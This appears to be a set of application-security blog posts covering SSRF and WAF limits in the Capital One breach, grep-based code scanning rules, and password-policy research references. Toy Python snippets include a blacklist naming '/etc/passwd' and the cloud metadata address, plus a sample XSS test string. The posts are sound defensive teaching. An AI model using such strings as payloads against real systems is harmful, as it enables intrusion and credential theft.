Some Useful AppSec Resources

While OWASP has no doubt earned its prestige as the #1 AppSec resource, there are many other good information sources across the web that I have collected over the years, and they have been very helpful to me and to others I have shared them with.  I especially enjoy a blog that explains things simply and clearly while remaining technically correct.  Below is a list of my favourite such resources.  I would be grateful to anyone who reciprocates with their own list.

Blogs / General AppSec

Certificate Pinning

Cookie Security


Cross Site Scripting




HTTP Security Headers

Input Validation

  • Validating Input – This is old, but it is a classic.  For more recent guidance, see the blog on the Martin Fowler website, The Basics of Web Application Security (linked above)



Mobile Security


  • An Illustrated Guide to OAuth and OpenID Connect – Most people want to dive into the technical details of OAuth before they really understand its purpose. Slow down, read this, and then you will have a better insight into this complex protocol



Race Conditions

Server Side Request Forgery


SQL Injection


Thoughts on the Capital One Security Breach

Whenever one reads about a security breach like the one at Capital One, security experts are eager to find out the anatomy of the attack.  Little by little, details have emerged.  The problem was initially called a firewall misconfiguration, but later reports seemed to suggest a Server Side Request Forgery (SSRF) vulnerability.  These conflicting stories do not seem to have been publicly resolved.  In fact, even a recent story from Wired is still suggesting firewall misconfiguration.  One thing that is clear is that Amazon is sticking to the firewall misconfiguration story while trying to distance themselves from any blame:

It’s inaccurate to argue that the Capital One breach was caused by IAM in any way. The intrusion was caused by a misconfiguration of a web application firewall and not the underlying cloud-based infrastructure

Which is it, firewall misconfiguration or SSRF, and if Amazon is not to blame, then who is?

Firewall Misconfiguration or SSRF?

It is not so common to hear of a web application being taken over due to a misconfigured firewall, so this sounded curious from the beginning.  The closest I have been able to find to an explanation comes from Krebs:

“According to a source with direct knowledge of the breach investigation, the problem stemmed in part from a misconfigured open-source Web Application Firewall (WAF) that Capital One was using as part of its operations hosted in the cloud with Amazon Web Services (AWS).

“Known as “ModSecurity,” this WAF is deployed along with the open-source Apache Web server to provide protections against several classes of vulnerabilities that attackers most commonly use to compromise the security of Web-based applications.

“The misconfiguration of the WAF allowed the intruder to trick the firewall into relaying requests to a key back-end resource on the AWS platform.”

Krebs then goes on to explain how the attacker performed SSRF on the web application to access the Amazon instance metadata, which allowed her to access IAM Role credentials and own the EC2 instance.

From this, we are actually starting to get some insight.  Indeed, the root cause of the problem does not seem to be a misconfigured firewall — instead it was an application SSRF vulnerability, which is a common theme for AWS hacks — in fact many tutorials about SSRF talk exactly about abusing AWS EC2 instances.

For those not familiar with SSRF, I strongly recommend this Contra Application Security tutorial that shows how Capital One might have been breached.  Assuming it is accurate, I must emphasize that it did not take a hacking genius to find this vulnerability.  This attack is low hanging fruit.

For Amazon and others to suggest that the problem was a misconfigured firewall shows a fundamental misunderstanding of web security.  Quite frankly, I find it shocking that one of the top cloud providers is going with this line of argument, so it's time to speak out:

WAFs are not a magic solution to your security problems

What is evident from the above quotes is that a WAF configuration is being blamed for a web application vulnerability.  This is entirely the wrong security mindset.

When a web application is built, security has to be part of the design. It is not something that is added on at the end: “Now turn on your WAF, then you’re secure!”  Nonsense!  Sure, WAF vendors are there to sell a product, so they like to make claims that stretch the truth.  But a company like Amazon should know better, and for them to point the finger at the WAF is very telling about Amazon’s security immaturity.

WAFs simply do not solve all security problems.  WAFs are a backup protection — if security protections were built into the application itself, then the WAF would offer no value.  In reality, developers make mistakes, so the WAF is a fallback security mechanism that can help when other things fail.  It is however by no means the primary form of defence.

WAF vendors need to be kept honest.  I’ve seen more than one make ridiculous claims: “Turn on your WAF and you are protected from the OWASP Top 10!”  It simply is not true.  WAFs can detect and stop a lot of common attacks, but there are so many things they cannot detect and/or stop.

WAFs work by searching for dangerous (“blacklist”) patterns and blocking requests that fit those patterns.  Blacklist validation can never be perfect, because there are an infinite number of possible inputs yet the blacklist must be finite.  Therefore it is just a matter of time before a good hacker finds the right pattern that gets past the WAF.
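To make the blacklist limitation concrete, here is a toy Python sketch. The "WAF" and its patterns are invented for illustration only, not taken from any real product: a substring blacklist catches the literal attack, but a URL-encoded variant walks straight past it even though the application decodes it back into the same attack string.

```python
from urllib.parse import unquote

# Invented blacklist patterns, for illustration only
BLACKLIST = ["<script", "169.254.169.254", "/etc/passwd"]

def waf_allows(raw_request: str) -> bool:
    """Toy WAF: block any request containing a blacklisted substring."""
    lowered = raw_request.lower()
    return not any(pattern in lowered for pattern in BLACKLIST)

# The literal attack pattern is caught...
assert waf_allows("GET /?q=<script>alert(1)</script>") is False

# ...but a URL-encoded variant slips through the blacklist, even though
# the application will decode it back into the same attack string.
encoded = "GET /?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
assert waf_allows(encoded) is True
assert "<script" in unquote(encoded).lower()
```

Real WAFs normalise common encodings, of course, but the principle stands: the attacker only needs one representation that the finite blacklist does not anticipate.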

Moreover, there are a number of strategies that hackers can use to bypass WAF blacklists, such as changing the encoding.  For good overviews, see WAF through the eyes of hackers and WAF Evasion Techniques.

Lastly, the suggestion that a WAF can stop all OWASP Top 10 issues (which some vendors will claim) is absurd, particularly since some of the attacks on the list do not go through the server at all.  For example, DOM-based cross site scripting happens between the attacker and victim without going through the server or WAF.  The vulnerability exists because the server serves up vulnerable JavaScript to the victim.  As another example, if the server is sending data via http rather than https, then anyone can eavesdrop on it without sending any data to the server at all.  WAFs just cannot and do not sprinkle magic fairy dust to make these problems go away.

In the Capital One breach, Amazon is blaming Capital One for not having their WAF stop the SSRF.  The reality is that the WAF is the backup protection, and the primary protection should have been at the application level.  As I explained in my Understanding Input Validation blog from February 2018 (which by the way talks about how SSRF is often abused on Amazon cloud computing), input validation is the proper way to stop SSRF.  That solves the problem exactly where the vulnerability exists — in the code — rather than expecting some add-on security protection to suddenly turn an insecure application into a secure one.
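As a sketch of what that application-level defence can look like, here is a minimal Python allowlist validator for user-supplied URLs. The host names are hypothetical, and a production version would need more care (redirect handling, DNS rebinding, etc.), but the idea is that only known-good destinations are ever fetched:

```python
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts this application legitimately fetches from
ALLOWED_HOSTS = {"reports.example.com", "images.example.com"}

def is_safe_fetch_url(url: str) -> bool:
    """Allowlist validation of a user-supplied URL before the server requests it."""
    parsed = urlparse(url)
    # Require https and an explicitly approved host; everything else is rejected
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS

assert is_safe_fetch_url("https://reports.example.com/q3.pdf") is True
# The instance metadata endpoint is rejected outright:
assert is_safe_fetch_url("http://169.254.169.254/latest/meta-data/") is False
```

Because this is an allowlist rather than a blacklist, there is no encoding trick to hunt for: anything not explicitly approved fails closed.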

So if it wasn’t a WAF misconfiguration, then whom do we blame?

The joy of recriminations!  In fact, I see a lot of failures which are far more significant than the WAF configuration failure.  For example:

  • Was the application penetration tested?  If not, that is a major failure in security process.  If it was, then it is a bit surprising to see that this vulnerability was missed — a good penetration tester should have found it.
  • Was the application security code reviewed?  A good code reviewer with a decent SAST tool could have found the vulnerability.  But we can only judge this if we know whether Capital One invested in application security code review, and that I do not know.
  • Were developers provided application security education?  While this is harder to depend upon, it is a recommended best practice today.
  • Maybe Amazon should shoulder some blame for not making SSRF harder to abuse in their infrastructure?  I’ll elaborate on that in the next section.
  • Whoever made the business decision to go with AWS, was security part of that decision?  I’ll elaborate on that in the next section too.

AWS is like a car without seatbelts!

Recently, Evan Johnson from Cloudflare wrote a blog post, Preventing the Capital One Breach.  That post hits the nail on the head.

Let’s cut to the chase: The three biggest cloud providers are Amazon AWS, Microsoft Azure, and Google Cloud Platform (GCP).  All three have very dangerous instance metadata endpoints, yet Azure and GCP applications seem to never get hit by this dangerous SSRF vulnerability.  On the other hand, AWS applications continue to get hit over and over and over again.  Does that tell you something?

Microsoft is a company that learned about security the hard way.  It took them a long time before they understood that it is their responsibility to make products that are secure by default and hard for the user to misuse: putting the responsibility for security in the hands of the user is dangerous.  A manifestation of this is their instance metadata endpoint, which builds in protections to stop SSRF attacks:


I can’t say Google learned security the hard way; rather, they hire a lot of smart people and clearly understand the importance of security to their business model.  Similar to Microsoft, they built SSRF defences into their instance metadata endpoint:


The point is that it is not sufficient for the attacker to just control the URL: the attacker must also be able to set an HTTP header in order to access the metadata endpoint.  In most cases, that is outside of the attacker’s control, which makes SSRF a lot harder to exploit.
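The GCP endpoint, for instance, only answers requests that carry the `Metadata-Flavor: Google` header (Azure similarly requires `Metadata: true`). A toy Python simulation of the principle — this is not a real cloud API, just a sketch of why the header requirement defeats a plain SSRF relay:

```python
def metadata_endpoint(path, headers):
    """Simulated hardened metadata service: refuse requests lacking the marker header."""
    if headers.get("Metadata-Flavor") != "Google":
        return 403, "missing required header"
    return 200, "metadata for " + path

# A classic SSRF relays an attacker-controlled URL, but the vulnerable
# application rarely lets the attacker control request headers, so the
# forged request is rejected:
assert metadata_endpoint("/computeMetadata/v1/", {})[0] == 403

# Legitimate software running on the instance adds the header deliberately:
assert metadata_endpoint("/computeMetadata/v1/", {"Metadata-Flavor": "Google"})[0] == 200
```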

If Amazon had similar protections like Microsoft and Google, then it is unlikely that we would be talking about the Capital One security breach right now: it simply would not have happened.  So, why won’t Amazon put such protections in their metadata endpoint?  Because Amazon believes it is not their responsibility to make their services hard to abuse, instead it’s the customer’s responsibility to get everything perfect themselves.

And that’s where the seatbelt analogy comes in.  If these vendors were selling cars, the Microsofts and Googles would be selling cars with seatbelts — understanding that you might crash, but designing the systems to reduce the impact to you.  Amazon, on the other hand, would be the vendor selling the car without seatbelts: if you crash, it’s your own fault.  If you die, don’t blame them.  They provided a car with a lot of nice features, and if you read the manual and drove it exactly as expected, you would have no problems.  But let’s be clear: if everything is not perfect, then you accept the consequences, and they will let you know it’s your fault and not theirs.  See it in their own words:

“The intrusion was caused by a misconfiguration of a web application firewall and not the underlying infrastructure or the location of the infrastructure.  AWS is constantly delivering services and functionality to anticipate new threats at scale, offering more security capabilities and layers than customers can find anywhere else including within their own datacenters, and when broadly used, properly configured and monitored, offer unmatched security—and the track record for customers over 13+ years in securely using AWS provides unambiguous proof that these layers work.”

Concluding remarks

Amazon lacks security maturity.  They do not understand key concepts that those seasoned in the industry have learned over many years of experience.  Suggesting a firewall is the fix for an application security problem is fundamentally wrong.  Relying on people to be experts at configuring firewalls to prevent attacks is a bad strategy: instead they should learn from the Microsofts and Googles about how to build infrastructure that is less fragile and less dependent upon perfect users.  That’s not to say that the other security controls do not have a place, but Amazon needs to understand that they are backup defences and not primary defences.

Hosting in AWS is like buying a car without seatbelts.  If your application gets hit as well, then maybe the stakeholders who pushed for AWS should shoulder the vast majority of the blame.  Next time security should be part of the decision making when choosing a cloud provider, which means both Azure and GCP should be preferred over AWS.


Don’t Underestimate Grep Based Code Scanning

Static application security testing (SAST) tools are perhaps the most common tool for an AppSec team in the endless effort to move security to the left. They can be integrated into development pipelines to offer quick feedback to developers and catch security bugs early, resulting in faster remediation times and improved return on investment for developing secure software.

The SAST market is dominated by a small number of big players that charge high licensing fees for tools that do sophisticated analysis. One of the main features of such tools is data flow analysis, which traces vulnerabilities from source to sink, potentially across a number of files. More information about what such tools can do can be found in this Synopsys report.  These tools typically take hours or even days to complete a scan, and may use a large amount of memory. Furthermore, some of the tools produce a large number of false positives, and have their own eccentricities. For organisations with deep pockets, the benefits outweigh the costs.

There are lower cost, more efficient SAST tools, but they typically lack sophistication in terms of the quality of security bug findings. Perhaps the most popular low-cost alternative is SonarQube, which is quite popular among developers. SonarQube does very quick scans, but lacks the data flow analysis capability that the more expensive tools have. As a consequence, security findings are reported at a single location (not source-to-sink analysis).

In this blog, we’re going to talk about grep-based code scanning, which is an old fashioned way of SAST scanning — but we argue that good grep-based scanning can do reasonably well compared to expensive SAST tools in terms of the quality of bugs found. While grep-based scanning in the form we present cannot do data flow analysis, we claim that what we miss as a result is not extensive. We also show examples of things we found that our commercial tool at the time missed. While the commercial tools are certainly capable of building up their rule sets to catch everything we catch, it falls upon them to add those rules.

I have experience with three leading SAST tools, but considerable experience with only one of them. I’m not going to call out any tools by name, but I do generally see room for improvement in all of them.

To make this blog the most beneficial to readers, we provide a starter pack of the grep-based rule sets that we have used. The tools we have developed are not in a state where they can be open sourced, and we do not have the time to fix them up. However, the rules we provide open the door for somebody with the time to do so. It takes very little effort to build a PoC in this way.

This is joint work with Jack Healy.

Tool philosophy

False positives seem part of the game in the SAST market. While I have heard of one tool trying to put considerable focus into removing false positives, I have not experienced such features in the tools that I have worked with — at least not “out of the box.” As a consequence, many tools seem to require manual inspection of the findings to remove the junk and focus on the issues that seem real. In our grep-based scanner, we play by the same rules: we assume that the results are going to be inspected manually, and the person running the tool has a basic understanding of security vulnerabilities and how to identify them in code. Thus, grep-based code scanning assumes a certain level of security competence and language expertise by the person running the code scan.

We take the philosophy that it is okay to have a large number of false positives if we are looking at something that is very serious and too often a problem — for example, SQL injection. We take the philosophy that it is not okay to have a lot of false positives if the issue is not that serious (by CVSS rating). Generally, we are not trying to find everything, but instead trying to maximise the value we get out of our code scanning under a manual inspection time constraint. It’s worth spending extra time to catch the big fish, not the small ones.

Depending upon how the tool is used, we may under some conditions want to report only things that are high confidence, and ignore everything else. A common example is in a CICD environment, where you want to break a build only if you are quite confident that something is wrong. So in our case, we have an option to only report very high confidence results. We also allow developers to flag false positives similar to how SonarQube does it, thus making it developer friendly.

What do we lose by not having data flow analysis?

While the expensive tools have the advantage of data flow analysis, our belief is that we can get a lot of what they get without it. The biggest exception is cross-site scripting, which our grep-based scanner does not find. We consider alternative tooling such as DAST to be an option for finding this serious issue.

Another example of an important issue that we are unlikely to find is logging of sensitive information. That typically does require some type of data flow analysis — you’re almost never going to find code that directly does something like Log(password).

SQL injection, on the other hand, is something we have found a number of times. The reason: we report every SQL query we find. Yes, it’s noisy, but it takes a code reviewer at most 10 seconds of manual inspection time to see whether there is string concatenation in the query, and if so, it may be vulnerable. If not, the reviewer can quickly dismiss it as a false positive. Obviously more sophisticated code scanning can make this less noisy (example: regular expression code scanning), but this is our starting point.
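A minimal Python sketch of this deliberately noisy rule (the regexes and sample lines are illustrative, not our production rules): every line that smells like SQL is reported, and a cheap concatenation heuristic highlights the ones most worth the reviewer's 10 seconds.

```python
import re

# "Report every SQL query we find": deliberately noisy keyword rule
SQL_HINT = re.compile(r"\bsql\b|\bquery\s*\(", re.IGNORECASE)
# Crude heuristic: a quote adjacent to '+' suggests string concatenation
CONCAT_HINT = re.compile(r"""["']\s*\+|\+\s*["']""")

def scan_lines(lines):
    """Return (line number, likely-concatenation flag, text) for every SQL-ish line."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        if SQL_HINT.search(line):
            likely_concat = bool(CONCAT_HINT.search(line))
            findings.append((lineno, likely_concat, line.strip()))
    return findings

code = [
    'sql = "SELECT * FROM users WHERE id = %s"   # parameterised',
    'sql = "SELECT * FROM users WHERE id = " + user_id',
]
findings = scan_lines(code)
# Both lines are reported; only the second is flagged as likely concatenation
assert [f[:2] for f in findings] == [(1, False), (2, True)]
```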

Certainly, tools with data flow analysis are more efficient for something important like SQL injection. However, the benefit from that efficiency is often lost when weighed against how much manual time is spent on false positives for issues that are not that important and/or low confidence. Furthermore, some tools do not do well at rating the seriousness of a vulnerability: they can be over-zealous in calling too many issues critical or high risk (though this may be configurable). Because of this, the overall usage of our tool — at least for us — seems to require similar manual effort to some of the popular commercial tools, despite the simplicity of the design.

Examples of things we found that our main commercial tool missed

Because of the simplicity of our design, and because we assume that a competent reviewer is going to look at the code, we were able to put in rules that help the reviewer find things that big commercial tools tend to miss.

One very fruitful area in finding security bugs is bad crypto. As mentioned in Top 10 Developer Crypto Mistakes, bad crypto is more prevalent than good crypto. Part of the reason for this is bad crypto APIs. Another part is that the tools don’t help developers catch mistakes. Vendors of these tools could find a lot more problems if they listened to cryptographers. Our tool flags any use of “crypt” and any other keywords that are indicative of bad cryptography, such as rc4, arcfour, md5, sha1, TripleDES, etc…. We go into more detail about crypto bugs in the rule sets.

Another issue that we find surprisingly often, and that our main commercial tool missed, is http://. Of course it should always be https://. Similarly, one can look for ftp:// and other insecure protocols.

There are also a number of dangerous functions that we flag, and often these open up discussions about coding practices. For example, the Angular trustAsHtml or React dangerouslySetInnerHTML. In our case, we had to educate the developers on the right approach to handling untrusted data, because they thought it was safe to sanitise data prior to putting it in the database and then use trustAsHtml upon display. We did not agree with this coding style and worked to change it.

One thing that we always like to look at is MVC controller functionality, because sometimes that’s where input validation should be applied (at other times you might do it in the model). We often find a lack of input validation, which does not necessarily imply a vulnerability but does show the need for improved defensive programming. Even more interesting, one time when we looked at a controller, we found that it was obviously not doing access control checking that it should have been doing, and this was one of the biggest findings that we caught. Normally access control problems are not something you would find with a SAST tool, but our different approach to using the tool made it work for us.

Sample rules: starter pack

Rules can go on forever, so here I want to focus on some of the more fruitful ones to get you started. Generally we do a case insensitive grep to find the keyword, and then we grep out (“grep -v”) things that got in by chance but are not actually the keyword we are looking for. We call these “exceptions” to our rules.  For example, “3des” is indicative of the insecure triple DES encryption algorithm, but we wouldn’t want to pull in a variable like “S3Destination”, which our developers might use for Amazon S3 storage (nothing to do with triple DES). We learn the exceptions over time.

A very common grep rule that we need to make exceptions for is “http:”.  While we are looking for insecure transport layer communications, the problem is that “http:” is also used in XML namespaces that have nothing to do with transport layer security.  This means we have to grep out things like “xmlns”.  Also, writing logic to ignore commented code helps a lot — otherwise you will pull in many false positives such as license text or Stack Overflow links, which often occur in comments.

It may look like we omitted some obvious rules in some cases, but sometimes there are subtle reasons. For example, even though we do a lot of crypto rules, we don’t do an “ECB” (insecure electronic code book mode of operation) search simply because it is too noisy. Those characters “E”, “C”, and “B” all look like hexadecimal numbers, and we often got false positives from hexadecimal values in code. It was deemed not fruitful enough to keep such a rule (as explained in our design philosophy above).
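The keyword-plus-exceptions scheme described above can be sketched in a few lines of Python (the rule and exception strings here are illustrative, not our full rule set):

```python
# Keyword rules with "grep -v" style exceptions; strings are illustrative
RULES = {
    "3des":  ["s3dest"],            # e.g. an S3Destination variable
    "http:": ["xmlns", "w3.org"],   # XML namespaces, schema URLs
}

def matches_rule(line: str, keyword: str) -> bool:
    """Case-insensitive keyword match, minus the rule's known exceptions."""
    lowered = line.lower()
    if keyword not in lowered:
        return False
    return not any(exc in lowered for exc in RULES[keyword])

assert matches_rule('cipher = "3DES/CBC/PKCS5Padding"', "3des") is True
assert matches_rule('s3Destination = bucket_url', "3des") is False
assert matches_rule('<root xmlns="http://www.w3.org/1999/xhtml">', "http:") is False
assert matches_rule('url = "http://internal.example.com"', "http:") is True
```

Growing the exception lists over time is exactly the "we learn the exceptions" process: each false positive a reviewer dismisses can become a new `grep -v` entry.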

We also try to group our rules by language to reduce false positives, although some rules apply to all languages. In our case we are primarily working on web software, so we do not include rules for languages like C/C++.

Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.

Grep string Look for Languages
password, passwd, credential, passphrase Hardcoded passwords, insecure password storage, insecure password transmission, password policy, etc…. all
sql, query( sql injection (string concatenation) all
strcat, strcpy, strncat, strncpy, sprintf, gets dangerous C functions used in iOS iOS
setAllowsAnyHTTPSCertificate, validatesSecureCertificate, allowInvalidCertificates, kCFStreamSSLValidatesCertificateChain disables TLS cert checking iOS
crypt hardcoded keys, fixed IVs, confusing encryption with message integrity, hardcoded salts, crypto soup, insecure mode of operation for symmetric cipher, misuse of a hash function, confusing a password with a crypto key, insecure randomness, key size too small.  See Top 10 Developer Crypto Mistakes all
CCCrypt IV is not optional (Apple API documentation is wrong) if security is required iOS
md5, sha1, sha-1 insecure, deprecated hash functions all
3des, des3, TripleDES insecure, deprecated encryption algorithm all
debuggable do not ship debuggable code android
WRITE_EXTERNAL_STORAGE, sdcard, getExternalStorageDirectory, isExternalStorageWritable check that sensitive data is not being written to insecure storage android
MODE_WORLD_READABLE, MODE_WORLD_WRITEABLE should never make files world readable or writeable android
SSLSocketFactory dangerous functionality — insecure API, easy to make mistakes java
SecretKeySpec verify that crypto keys are not hardcoded java
PBEParameterSpec verify salt is not hardcoded and iterations is at least 10,000 java
PasswordDeriveBytes insecure password based key derivation function (PBKDF1) c#
rc4, arcfour deprecated, insecure stream cipher all
exec( remote code execution if user input is sent in java
eval( remote code execution if user input is sent in javascript
http: insecure transport layer security, need https: all
ftp: insecure file transfer, need ftps: all
ALLOW_ALL_HOSTNAME_VERIFIER, AllowAllHostnameVerifier certificate checking disabled java
printStackTrace should not output stack traces (information disclosure) java, jsp
readObject( potential deserialization vulnerability if input is untrusted java
dangerouslySetInnerHTML dangerous React functionality (XSS) javascript
trustAsHtml dangerous Angular functionality (XSS) javascript
Math.random( not cryptographically secure javascript
java.util.Random not cryptographically secure java
SAXParserFactory, DOM4J, XMLInputFactory, TransformerFactory, javax.xml.validation.Validator, SchemaFactory, SAXTransformerFactory, XMLReader, SAXBuilder, SAXReader, javax.xml.bind.Unmarshaller, XPathExpression, DOMSource, StAXSource vulnerable to XXE by default java
controller MVC controller functionality: check for input validation c#, java
HttpServletRequest check for input validation java
request.getParameter check for input validation jsp
exec dynamic sql: potential for sql injection sql
getAcceptedIssuers If null is returned, then TLS host name verification is disabled android
isTrusted If returns true, then TLS validation is disabled java
trustmanager could be used to skip cert checking java
ServerCertificateValidationCallback If returns true, then TLS validation is disabled c#
checkCertificateName If set to false, then hostname verification is disabled c#
checkCertificateRevocationList If set to false, then CRLS not checked c#
NODE_TLS_REJECT_UNAUTHORIZED certificate checking is disabled javascript
rejectUnauthorized, insecure, strictSSL, clientPemCrtSignedBySelfSignedRootCaBuffer cert checking may be disabled javascript
NSExceptionDomains, NSAllowsArbitraryLoads, NSExceptionAllowsInsecureHTTPLoads allows http instead of https traffic iOS
kSSLProtocol3, kSSLProtocol2, kSSLProtocolAll, NSExceptionMinimumTLSVersion allows insecure SSL communications iOS
public-read publicly readable Amazon S3 bucket — make sure no confidential data stored all
AWS_KEY look for hardcoded AWS keys all
urllib3.disable_warnings certificate checking may be disabled python
ssl_version can be used to allow insecure SSL comms python
cookie make sure cookies set secure and httpOnly attributes all
kSecAttrAccessibleAlways insecure keychain access iOS

Collection of References on Why Password Policies Need to Change

Organisations like NIST and the UK National Cyber Security Centre (NCSC) are pushing password security policies that are much different from those of the past. Most notably, password expiry and character composition rules are being dropped, replaced by other, more user friendly recommendations.  Despite their efforts, many organisations are very slow in changing to the modern guidance, and instead remain with password policy practices characteristic of 2004 guidance. If you’d like to work towards change in your organisation, it helps to have a useful set of references to pass on to those who write the policies.

Is it worth trying to make the change? In my judgement, an important part of building a positive security culture is considering pain versus value in every decision you make. A lot of historical guidance for password security is high pain and little to no security value according to what we have learned, and sometimes causes more harm than good in ways that policy makers never anticipated. We also must remember that availability is one of the three pillars of security: when users get locked out of their account for reasons that can at least partially be attributed to password security policies, then we are not putting the best face of security forward.  This is especially true when there are better ways to do things:  Security policy writers need to keep their knowledge up to date.

This blog contains information from various sources, including research papers, reports/white papers, popular blogs, government websites, and news organisations. Dates of publication are included so readers can keep in mind that more recent publications are based upon more recent knowledge. While there are many existing blogs on password security, the main contributions here are:

  1. Assembling a large number of modern sources together,
  2. Providing compact summaries of why the sources are relevant to the purpose of making password policy change within an organisation,
  3. Including research publications that show where new recommendations are derived from (thus going beyond “appeal to authority” arguments — the research is there for anybody who cares to check it themselves).

Overview of modern password security guidance

  • (WSJ news article – requires subscription, 2017) The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!. This article talks about how the author of the classic NIST document that proposed composition rules and similar guidance (from NIST Special Publication 800-63 Appendix A) now rejects those recommendations. Those recommendations seemed okay back then, but given what we have learned since, they no longer serve the original intent. New recommendations have been written that balance security with usability needs.
  • (Naked Security news article, 2016) NIST’s new password rules – what you need to know. This is a compact summary of the changes to NIST’s password security guidance. Because the article is short, it is a good way to open up the conversation with people who have limited time or attention span. It tells what policy makers need to change to be in compliance with NIST guidelines.
  • (Troy Hunt blog, 2017) Passwords Evolved: Authentication Guidance for the Modern Era. This is quite a long, but very well written article about the changes to NIST’s password guidance and why the changes are being made. It also draws from the UK government’s guidance and Microsoft’s guidance to strengthen the argument. The section on “Listen to Your Governments (and Smart Tech Companies)” makes a great appeal to authority argument on why companies should take these recommendations seriously. Overall, it is a good read for those who have time and interest to read it.

The new recommendations — original sources

  • (NIST publication, 2017) NIST Special Publication 800-63B. This is right from the horse’s mouth, but it’s not a document to start the conversation with, because the document is large and uses terminology that will take time for many readers to interpret. It is nevertheless the proof you will need if people question whether NIST is really making such a recommendation. For example, the requirement to not impose composition rules on passwords (“memorized secrets”) is given in section 10.2.1, which also says these secrets should not be required to change periodically. The publication also requires that hints for recovering passwords not be allowed; the requirement to not allow secret questions for account recovery is better found in NIST’s FAQ.
  • (NIST web page FAQ, 2019) NIST Special Publication 800-63: Digital Identity Guidelines Frequently Asked Questions. This is an easier place to start than the NIST original publication, as it is more human readable. It gets right to the point on questions like why composition rules are no longer recommended, why password expiry is no longer recommended, and why secret questions for account recovery are no longer permitted.
  • (NCSC publication, 2018) Password administration for system owners. These recommendations are similar in nature to the NIST recommendations. See sections on “Don’t enforce regular password expiry” and “Do not use complexity requirements”. But additionally worth pointing out is “Reduce your organisation’s reliance on passwords” (we have too many passwords already) and “Implement technical solutions”, which includes guidance on other ways of helping protect user passwords while not locking users out of their accounts long-term.
  • (NCSC infographic, 2018) NCSC Password Policy Advice for system owners. A simple graphic that shows the risks and how to help improve password security within an organisation. The right half, in purple, gives password policy recommendations. Unfortunately, while most of the infographic is good, there is one serious blunder: it recommends SHA-256 for password hashing. SHA-256 was not designed for this type of operation; those who know the cryptography understand this, and those who don’t can get the understanding from an old Troy Hunt article.
  • (NCSC blog, 2016) The problems with forcing regular password expiry.  A simple blog that explains why password expiry causes more harm than good. In short, users choose passwords similar to their previous ones and minimally meet the complexity requirement in order to create a password they can memorise. There is also an increased tendency of forgotten passwords, which imposes a productivity cost on an organisation.
  • (Microsoft publication, 2016) Microsoft Password Guidance. This report is great, because it is easy to read and gets right to the point. On the first page it enumerates 7 recommendations to system administrators which include things not to do (do not enforce password expiry or composition rules) and what to do (8 character minimum password, ban common passwords, etc…). Further in the document it goes into more details and includes references to research reports that justify why the changes are being made. Overall, the clarity, simplicity, and completeness (especially research references) of this publication make it a top source for referencing to others. However, because it predates the NIST and NCSC changes, it lacks the references to NIST’s new guidelines. It also lacks details on how organisations can implement the risk based multi factor authentication that it recommends.
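On the SHA-256 blunder noted in the NCSC infographic item above: general-purpose hash functions are fast by design, which is exactly what you do not want for password storage. A minimal sketch of a purpose-built slow KDF, using only Python's standard library (the iteration count here is illustrative, not a recommendation):

```python
import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    """Derive a salted, deliberately slow hash with PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)  # unique random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = 600_000) -> bool:
    """Re-derive and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)
```

The point is the work factor: a plain SHA-256 of a password can be attempted billions of times per second on commodity GPUs, while a KDF with a high iteration count makes each guess expensive.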

Research on why password policies need to change

  • (Research paper, 2010) The Security of Modern Password Expiration: An Algorithmic Framework and Empirical Analysis. The main goal of password expiry is limiting the amount of time an attacker has access to an account in the event of password compromise. This paper questions whether that goal is met by analysing a dataset of 7700 accounts to determine whether knowing one password allows recovering the user’s other passwords. The fallacy behind password expiry recommendations is that security administrators assume users choose each password randomly and independently of their other passwords, but in reality the vast majority of users don’t. The paper shows that even for websites where users have an incentive to protect their accounts (for example, one holding payroll data), new passwords tend to be strongly related to previous ones. The study found that the researchers could derive 17% of new passwords within 5 guesses, and 41% within seconds in an offline attack with little effort. The authors write:

    “Combined with the annoyance that expiration causes users, our evidence suggests it may be appropriate to do away with password expiration altogether, perhaps as a concession while requiring users to invest the effort to select a significantly stronger password than they would otherwise (e.g., a much longer passphrase).”

  • (Research paper, 2010) Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords.  When NIST wrote their 2004 Special Publication 800-63, which contained the recommendations for password policy, they included entropy estimates of how strong passwords complying with the policy would be. This research does password cracking on sets of real user data to show that those estimates are far too high. Part of the reason is that users tend to follow similar patterns when forced to comply with a password policy. For example, when required to use digits, users tend to either choose all digits or put the digits at the end of the password (nearly 85%); when required to use an upper case letter, users tend to use either all upper case or capitalise only the first letter (89%); and when required to use a special character, users tend to put it at the end of the password (28.5%). An attacker can use known human behaviour to increase his chances of success in password cracking attacks. The paper notes that using a password blacklist of 50,000 passwords helps significantly, but not as much as NIST predicted. The authors conclude:

    Our findings were that … most common password creation policies remains vulnerable to online attack. This is due to a subset of the users picking easy to guess passwords that still comply with the password creation policy in place, for example “Password!1”

  • (Research paper, 1999) Users are not the Enemy.  This paper surveys a large number of users to understand the problems they have with password security. While it is true that many users do not assume the responsibility they should for protecting their accounts, the study also finds that part of the problem is the difficulty users have complying with password security policies. Users have a large number of passwords that must change regularly, each with different complexity requirements, which makes it much more likely that users will do things they should not just so they do not lose access to their accounts. The section on “Security needs user-centered design” notes that

    “Many of these [security] mechanisms create overheads for users, or require unworkable user behavior. It is therefore hardly surprising to find that many users try to circumvent such mechanisms.”

    The paper concludes with a set of recommendations to help users with passwords. However, the paper is from 1999, so the recommendations reflect the knowledge of the time.

